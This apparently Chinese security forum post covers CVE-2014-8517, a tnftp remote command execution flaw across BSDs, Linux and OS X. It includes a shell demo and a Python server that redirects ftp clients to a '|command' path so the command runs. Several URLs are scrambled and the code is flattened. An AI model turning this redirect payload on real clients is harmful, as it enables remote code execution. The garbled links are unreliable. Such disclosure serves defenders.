10月28日，一份公开的邮件中曝出FTP远程执行命令漏洞，漏洞影响到的Unix系统包括：Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影响到了苹果的OS X操作系统的最新版本Yosemite 10.10。

NetBSD的一位开发人员(Jared McNeill)证实了这个漏洞可以通过tnftp从WEB服务器远程执行恶意命令，并且此漏洞已被编号为CVE-2014-8517 ：

    a20$ pwd     /var/www/cgi-bin     a20$ ls -l     total 4     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a     a20$ cat redirect     #!/bin/sh     echo 'Status: 302 Found'     echo 'Content-Type: text/html'     echo 'Connection: keep-alive'     echo 'Location: 062K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0u0Q4x3X3f1I4z5g2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8W2)9%4b7%4g2F1j5h3#2W2i4K6t1#2x3U0m8Q4x3X3c8S2i4K6t1%4i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.    echo     a20$   a20$ ftp http://localhost/cgi-bin/redirect   Trying ::1:80 ...   ftp: Can't connect to `::1:80': Connection refused   Trying 127.0.0.1:80 ...   Requesting http://localhost/cgi-bin/redirect   Redirected to d78K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0u0Q4x3X3f1I4z5g2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8W2)9%4b7%4g2F1j5h3#2W2i4K6t1#2x3U0m8Q4x3X3c8S2i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.  Requesting 74aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0u0Q4x3X3f1I4z5g2)9J5c8X3y4Y4K9g2)9J5k6r3u0A6L8W2)9J5c8W2)9%4b7%4g2F1j5h3#2W2i4K6t1#2x3U0m8Q4x3X3c8S2i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.      32      101.46 KiB/s   32 bytes retrieved in 00:00 (78.51 KiB/s)   NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36   ADT 2014   Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE   BOARD evbarm   a20$漏洞影响范围及公告

Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系统开发商已经意识到了此漏洞的危害，其中Debian, Red Hat, Gnetoo and Novell已经发出了漏洞公告：

漏洞检测脚本(请勿用于非法用途)

And you should see the command executed.All wrongs reversed - @stevelord"""import BaseHTTPServerimport sysimport socketimport urllibhostname = socket.getfqdn() # Set this to your IP if you have no FQDNport = 8000 # Set this to the port you want to run this oncmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying."cmd = urllib.quote(cmd)redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmdclass RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(s):  if cmd in s.path:   s.send_response(200)   s.end_headers()  else:   s.send_response(302)   s.send_header("Location", redir)   s.end_headers()if __name__ == "__main__": print "redirecting to,", redir server_class = BaseHTTPServer.HTTPServer httpd = server_class((hostname, port), RedirectHandler) try:  httpd.serve_forever()  print "Started serving." except KeyboardInterrupt:  pass httpd.server_close() print "\nStopped serving."解决方案和更详细的内容参见：

028K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5$3I4A6M7%4c8K6i4K6u0W2L8%4u0Y4i4K6u0r3L8%4y4K6i4K6u0V1M7$3g2U0i4K6u0r3x3U0l9I4y4q4)9J5c8Y4p5@1i4K6u0r3y4o6f1&6 1abK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5$3I4A6M7%4c8K6i4K6u0W2L8%4u0Y4i4K6u0r3L8%4y4K6i4K6u0V1M7$3g2U0i4K6u0r3x3U0l9I4y4q4)9J5c8Y4p5@1i4K6u0r3y4o6j5@1

0f0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5$3I4A6M7%4c8K6i4K6u0W2L8%4u0Y4i4K6u0r3L8%4y4K6i4K6u0V1M7$3g2U0i4K6u0r3x3U0l9I4y4q4)9J5c8Y4p5@1i4K6u0r3y4o6j5H3

参考信息来源：34fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5%4g2J5K9i4c8&6N6$3g2W2K9#2)9J5k6h3y4G2L8g2)9J5c8X3&6A6P5q4)9J5k6s2y4&6M7%4c8W2L8i4y4Q4x3X3c8S2k6X3k6W2j5%4c8W2k6q4)9J5k6r3k6@1M7q4)9J5k6s2u0W2L8h3!0@1k6g2)9J5k6r3y4G2L8h3#2S2L8X3c8Q4x3X3c8W2P5r3g2U0N6i4c8A6L8$3&6Q4x3X3c8$3N6h3I4F1k6i4u0S2j5X3W2D9K9i4c8&6

[培训]科锐逆向工程师培训第53期2025年7月8日开班！